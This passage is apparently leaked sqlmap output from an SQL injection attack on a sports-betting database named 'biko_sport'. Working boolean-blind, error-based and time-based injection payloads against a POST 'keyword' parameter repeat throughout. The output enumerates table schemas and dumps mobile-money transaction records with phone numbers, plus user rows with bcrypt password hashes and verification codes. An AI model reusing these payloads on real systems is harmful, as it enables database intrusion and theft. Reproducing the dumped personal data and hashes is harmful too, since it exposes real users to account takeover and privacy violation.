  1391. Database: biko_sport
  1392. Table: auth_assignment
  1393. [3 columns]
  1394. +------------+-------------+
  1395. | Column | Type |
  1396. +------------+-------------+
  1397. | created_at | int(11) |
  1398. | item_name | varchar(64) |
  1399. | user_id | varchar(64) |
  1400. +------------+-------------+
  1401.  
  1402. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1403. ---
  1404. Place: POST
  1405. Parameter: keyword
  1406. Type: boolean-based blind
  1407. Title: AND boolean-based blind - WHERE or HAVING clause
  1408. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1409.  
  1410. Type: error-based
  1411. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1412. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1413.  
  1414. Type: AND/OR time-based blind
  1415. Title: MySQL > 5.0.11 AND time-based blind
  1416. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1417. ---
  1418. web application technology: PHP 5.6.33, Nginx
  1419. back-end DBMS: MySQL 5.0
  1420. Database: biko_sport
  1421. Table: bb
  1422. [12 columns]
  1423. +--------------+---------------+
  1424. | Column | Type |
  1425. +--------------+---------------+
  1426. | bet_amount | decimal(10,2) |
  1427. | bet_id | int(11) |
  1428. | bet_message | varchar(200) |
  1429. | created | datetime |
  1430. | created_by | varchar(70) |
  1431. | modified | datetime |
  1432. | possible_win | decimal(10,2) |
  1433. | profile_id | bigint(20) |
  1434. | reference | varchar(70) |
  1435. | status | smallint(1) |
  1436. | total_odd | decimal(10,2) |
  1437. | win | tinyint(1) |
  1438. +--------------+---------------+
  1439.  
  1440. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1441. ---
  1442. Place: POST
  1443. Parameter: keyword
  1444. Type: boolean-based blind
  1445. Title: AND boolean-based blind - WHERE or HAVING clause
  1446. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1447.  
  1448. Type: error-based
  1449. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1450. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1451.  
  1452. Type: AND/OR time-based blind
  1453. Title: MySQL > 5.0.11 AND time-based blind
  1454. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1455. ---
  1456. web application technology: PHP 5.6.33, Nginx
  1457. back-end DBMS: MySQL 5.0
  1458. Database: biko_sport
  1459. Table: mobile_app_profile
  1460. [9 columns]
  1461. +--------------+---------------------+
  1462. | Column | Type |
  1463. +--------------+---------------------+
  1464. | app | varchar(120) |
  1465. | date_created | datetime |
  1466. | device_id | varchar(200) |
  1467. | id | int(10) unsigned |
  1468. | modified | timestamp |
  1469. | msisdn | varchar(30) |
  1470. | profile_id | bigint(20) unsigned |
  1471. | status | int(11) |
  1472. | token_id | varchar(200) |
  1473. +--------------+---------------------+
  1474.  
  1475. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1476. ---
  1477. Place: POST
  1478. Parameter: keyword
  1479. Type: boolean-based blind
  1480. Title: AND boolean-based blind - WHERE or HAVING clause
  1481. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1482.  
  1483. Type: error-based
  1484. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1485. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1486.  
  1487. Type: AND/OR time-based blind
  1488. Title: MySQL > 5.0.11 AND time-based blind
  1489. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1490. ---
  1491. web application technology: PHP 5.6.33, Nginx
  1492. back-end DBMS: MySQL 5.0
  1493. Database: biko_sport
  1494. Table: mpesa_transaction
  1495. [14 columns]
  1496. +----------------------+---------------+
  1497. | Column | Type |
  1498. +----------------------+---------------+
  1499. | account_no | varchar(100) |
  1500. | business_number | int(8) |
  1501. | created | datetime |
  1502. | enc_params | varchar(250) |
  1503. | message | varchar(300) |
  1504. | modified | timestamp |
  1505. | mpesa_amt | decimal(53,2) |
  1506. | mpesa_code | varchar(100) |
  1507. | mpesa_customer_id | varchar(50) |
  1508. | mpesa_sender | varchar(100) |
  1509. | mpesa_transaction_id | bigint(20) |
  1510. | msisdn | bigint(20) |
  1511. | promo_code | varchar(50) |
  1512. | transaction_time | datetime |
  1513. +----------------------+---------------+
  1514.  
  1515. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1516. ---
  1517. Place: POST
  1518. Parameter: keyword
  1519. Type: boolean-based blind
  1520. Title: AND boolean-based blind - WHERE or HAVING clause
  1521. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1522.  
  1523. Type: error-based
  1524. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1525. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1526.  
  1527. Type: AND/OR time-based blind
  1528. Title: MySQL > 5.0.11 AND time-based blind
  1529. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1530. ---
  1531. web application technology: PHP 5.6.33, Nginx
  1532. back-end DBMS: MySQL 5.0
  1533. Database: biko_sport
  1534. Table: mpesa_transaction
  1535. [2 entries]
  1536. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1537. | mpesa_customer_id | mpesa_transaction_id | msisdn | created | message | modified | mpesa_amt | promo_code | enc_params | mpesa_code | account_no | mpesa_sender | business_number | transaction_time |
  1538. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1539. | +255756000915 | 5137 | 255756000915 | 2018-02-14 19:52:52 | 5BE8168ON1A | 2018-02-14 19:52:51 | 20000.00 | NULL | | 5BE8168ON1A | +255756000915 | | 7808353 | 2018-02-14 19:52:52 |
  1540. | 000 | 315 | 255758400696 | 2018-02-04 12:06:17 | 5B4715GE41B | 2018-02-04 12:06:17 | 500.00 | NULL | | 5B4715GE41B | 000 | | 5607720 | 2018-02-04 12:06:17 |
  1541. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1542.  
  1543. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1544. ---
  1545. Place: POST
  1546. Parameter: keyword
  1547. Type: boolean-based blind
  1548. Title: AND boolean-based blind - WHERE or HAVING clause
  1549. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1550.  
  1551. Type: error-based
  1552. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1553. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1554.  
  1555. Type: AND/OR time-based blind
  1556. Title: MySQL > 5.0.11 AND time-based blind
  1557. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1558. ---
  1559. web application technology: PHP 5.6.33, Nginx
  1560. back-end DBMS: MySQL 5.0
  1561. Database: biko_sport
  1562. Table: profile_balance
  1563. [7 columns]
  1564. +--------------------+---------------+
  1565. | Column | Type |
  1566. +--------------------+---------------+
  1567. | balance | decimal(10,2) |
  1568. | bonus_balance | decimal(10,2) |
  1569. | created | datetime |
  1570. | modified | timestamp |
  1571. | profile_balance_id | int(10) |
  1572. | profile_id | bigint(20) |
  1573. | transaction_id | bigint(20) |
  1574. +--------------------+---------------+
  1575.  
  1576. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1577. ---
  1578. Place: POST
  1579. Parameter: keyword
  1580. Type: boolean-based blind
  1581. Title: AND boolean-based blind - WHERE or HAVING clause
  1582. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1583.  
  1584. Type: error-based
  1585. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1586. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1587.  
  1588. Type: AND/OR time-based blind
  1589. Title: MySQL > 5.0.11 AND time-based blind
  1590. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1591. ---
  1592. web application technology: PHP 5.6.33, Nginx
  1593. back-end DBMS: MySQL 5.0
  1594. Database: biko_sport
  1595. Table: profile_setting
  1596. [10 columns]
  1597. +--------------------+---------------+
  1598. | Column | Type |
  1599. +--------------------+---------------+
  1600. | balance | decimal(10,2) |
  1601. | created | datetime |
  1602. | name | varchar(255) |
  1603. | password | text |
  1604. | profile_id | int(20) |
  1605. | profile_setting_id |
  1606. | reference_id | varchar(20) |
  1607. | status | int(1) |
  1608. | updated_at | timestamp |
  1609. | verification_code | int(11) |
  1610. +--------------------+---------------+
  1611.  
  1612. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1613. ---
  1614. Place: POST
  1615. Parameter: keyword
  1616. Type: boolean-based blind
  1617. Title: AND boolean-based blind - WHERE or HAVING clause
  1618. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1619.  
  1620. Type: error-based
  1621. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1622. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1623.  
  1624. Type: AND/OR time-based blind
  1625. Title: MySQL > 5.0.11 AND time-based blind
  1626. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1627. ---
  1628. web application technology: PHP 5.6.33, Nginx
  1629. back-end DBMS: MySQL 5.0
  1630. Database: biko_sport
  1631. Table: profile_settings
  1632. [14 columns]
  1633. +------------------------+---------------+
  1634. | Column | Type |
  1635. +------------------------+---------------+
  1636. | balance | bigint(20) |
  1637. | created_at | timestamp |
  1638. | max_daily_possible_win | decimal(10,2) |
  1639. | max_stake | decimal(10,2) |
  1640. | multibet_bet_max_stake | decimal(10,2) |
  1641. | name | varchar(250) |
  1642. | password | text |
  1643. | profile_id | bigint(20) |
  1644. | profile_setting_id | bigint(20) |
  1645. | reference_id | varchar(20) |
  1646. | single_bet_max_stake | decimal(10,2) |
  1647. | status | smallint(1) |
  1648. | updated_at | timestamp |
  1649. | verification_code | int(11) |
  1650. +------------------------+---------------+
  1651.  
  1652. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1653. ---
  1654. Place: POST
  1655. Parameter: keyword
  1656. Type: boolean-based blind
  1657. Title: AND boolean-based blind - WHERE or HAVING clause
  1658. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1659.  
  1660. Type: error-based
  1661. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1662. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1663.  
  1664. Type: AND/OR time-based blind
  1665. Title: MySQL > 5.0.11 AND time-based blind
  1666. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1667. ---
  1668. web application technology: PHP 5.6.33, Nginx
  1669. back-end DBMS: MySQL 5.0
  1670. Database: biko_sport
  1671. Table: profile_settings
  1672. [11 entries]
  1673. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1674. | profile_id | reference_id | profile_setting_id | name | status | balance | password | max_stake | created_at | updated_at | verification_code | single_bet_max_stake | max_daily_possible_win | multibet_bet_max_stake |
  1675. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1676. | 6 | | 7 | NULL | 1 | 0 | $2y$08$QmE3T0hoL2FMckF3eGxKa.SRpg/OzLlHLsC8dHMadpeXGCdmDqLpW | 0.00 | 2018-02-01 14:02:39 | 2018-02-06 00:37:27 | 3766 | 0.00 | 0.00 | 0.00 |
  1677. | 7 | | 5 | NULL | 1 | 0 | $2y$08$eTB0Umw5MzVLTTZaOWtSau/xZaFq4ZOdqJc3wdk.1dEISha0D.z3u | 0.00 | 2018-02-01 12:13:56 | 2018-02-01 12:15:36 | 2516 | 0.00 | 0.00 | 0.00 |
  1678. | 8 | DESKTOP | 3 | NULL | 1 | 0 | $2y$08$TWtoNzBGbmpNVU1laEdpeeiYg4Ig6GEu.ZeqsK78NS0NZbE/CTEza | 0.00 | 2018-01-31 03:34:07 | 2018-02-08 19:06:52 | 2270 | 0.00 | 0.00 | 0.00 |
  1679. | 9 | DESKTOP | 1129 | NULL | 1 | 0 | $2y$08$aXZZalVjNDFSL0J4dmlGZuJZZqFc8wSmH0SePTX3Q.x97gV8MVIyy | 0.00 | 2018-02-08 00:04:20 | 2018-02-08 00:04:40 | 1810 | 0.00 | 0.00 | 0.00 |
  1680. | 10 | DESKTOP | 138 | NULL | 1 | 0 | $2y$08$SWplQm5vanBzdUFjVktPV.XVoKmOjB.OdHZZPDKdPF1m6R2/Ahgwi | 0.00 | 2018-02-04 08:49:47 | 2018-02-11 17:34:40 | 3164 | 0.00 | 0.00 | 0.00 |
  1681. | 14 | | 8 | NULL | 1 | 0 | $2y$08$aUJkbXRlY0NnOG1aRUdGOOu6ibKFdsY9unrSvnLW6ObzeaKqeUEJ. | 0.00 | 2018-02-01 16:43:58 | 2018-02-01 16:44:35 | 9961 | 0.00 | 0.00 | 0.00 |
  1682. | 17 | DESKTOP | 1 | NULL | 0 | 0 | $2y$08$Z1NuQzN1cFduaTAxSVVPWeWPXHJAybuDcGayvkRWxTegtvKksWzPC | 0.00 | 2018-01-30 17:50:36 | 2018-01-30 17:50:36 | 1180 | 0.00 | 0.00 | 0.00 |
  1683. | 18 | | 9 | NULL | 1 | 0 | $2y$08$Y04zb2ZqNk1WZG5aaXFEUONme.ZoHkgcGMzM7SIzeMeuTbXFBt8pO | 0.00 | 2018-02-01 18:13:40 | 2018-02-01 18:14:48 | 2754 | 0.00 | 0.00 | 0.00 |
  1684. | 19 | DESKTOP | 4 | NULL | 1 | 0 | $2y$08$V2NEdjNxT3p1elp4N05aVuzXtE8ebQX4QB/trva5bag0.kgYXaU3m | 0.00 | 2018-01-31 15:30:46 | 2018-02-01 20:30:31 | 2075 | 0.00 | 0.00 | 0.00 |
  1685. | 20 | DESKTOP | 2 | NULL | 0 | 0 | $2y$08$RDVEQytaV1BYVFQ1aXFkM.6X0u6eyARqnOUTWry20VlYGjZ1n15/i | 0.00 | 2018-01-30 17:51:31 | 2018-01-30 17:51:31 | 1942 | 0.00 | 0.00 | 0.00 |
  1686. | 21 | DESKTOP | 13 | NULL | 1 | 0 | $2y$08$ZWpvaDRHdElaVGtiWUY0QuK0Jxvb7pmCKELX2CjwpVnUzlJL2.rw2 | 0.00 | 2018-02-02 14:11:32 | 2018-02-11 15:45:04 | 2993 | 0.00 | 0.00 | 0.00 |
  1687. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1688.  
  1689. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1690. ---
  1691. Place: POST
  1692. Parameter: keyword
  1693. Type: boolean-based blind
  1694. Title: AND boolean-based blind - WHERE or HAVING clause
  1695. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1696.  
  1697. Type: error-based
  1698. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1699. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1700.  
  1701. Type: AND/OR time-based blind
  1702. Title: MySQL > 5.0.11 AND time-based blind
  1703. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1704. ---
  1705. web application technology: PHP 5.6.33, Nginx
  1706. back-end DBMS: MySQL 5.0
  1707. Database: biko_sport
  1708. Table: profile_setting
  1709. [0 entries]
  1710. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1711. | profile_id | reference_id | profile_setting_id | name | status | created | balance | password | updated_at | verification_code |
  1712. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1713. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1714.  
  1715. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1716. ---
  1717. Place: POST
  1718. Parameter: keyword
  1719. Type: boolean-based blind
  1720. Title: AND boolean-based blind - WHERE or HAVING clause
  1721. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1722.  
  1723. Type: error-based
  1724. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1725. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1726.  
  1727. Type: AND/OR time-based blind
  1728. Title: MySQL > 5.0.11 AND time-based blind
  1729. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1730. ---
  1731. web application technology: PHP 5.6.33, Nginx
  1732. back-end DBMS: MySQL 5.0
  1733. Database: biko_sport
  1734. Table: backup_profile
  1735. [0 entries]
  1736. +------------+--------+--------+---------+---------+----------+------------+
  1737. | profile_id | status | msisdn | network | created | modified | created_by |
  1738. +------------+--------+--------+---------+---------+----------+------------+
  1739. +------------+--------+--------+---------+---------+----------+------------+
  1740.  
  1741. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1742. ---
  1743. Place: POST
  1744. Parameter: keyword
  1745. Type: boolean-based blind
  1746. Title: AND boolean-based blind - WHERE or HAVING clause
  1747. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1748.  
  1749. Type: error-based
  1750. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1751. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1752.  
  1753. Type: AND/OR time-based blind
  1754. Title: MySQL > 5.0.11 AND time-based blind
  1755. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1756. ---
  1757. web application technology: PHP 5.6.33, Nginx
  1758. back-end DBMS: MySQL 5.0
  1759. Database: biko_sport
  1760. Table: account_freeze
  1761. [5 columns]
  1762. +-------------------+-------------+
  1763. | Column | Type |
  1764. +-------------------+-------------+
  1765. | account_freeze_id | bigint(20) |
  1766. | created | datetime |
  1767. | modified | timestamp |
  1768. | msisdn | varchar(50) |
  1769. | status | tinyint(4) |
  1770. +-------------------+-------------+
  1771.  
  1772. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1773. ---
  1774. Place: POST
  1775. Parameter: keyword
  1776. Type: boolean-based blind
  1777. Title: AND boolean-based blind - WHERE or HAVING clause
  1778. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1779.  
  1780. Type: error-based
  1781. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1782. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1783.  
  1784. Type: AND/OR time-based blind
  1785. Title: MySQL > 5.0.11 AND time-based blind
  1786. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1787. ---
  1788. web application technology: PHP 5.6.33, Nginx
  1789. back-end DBMS: MySQL 5.0
  1790. Database: biko_sport
  1791. Table: msi
  1792. [1 column]
  1793. +--------+------------+
  1794. | Column | Type |
  1795. +--------+------------+
  1796. | number | bigint(20) |
  1797. +--------+------------+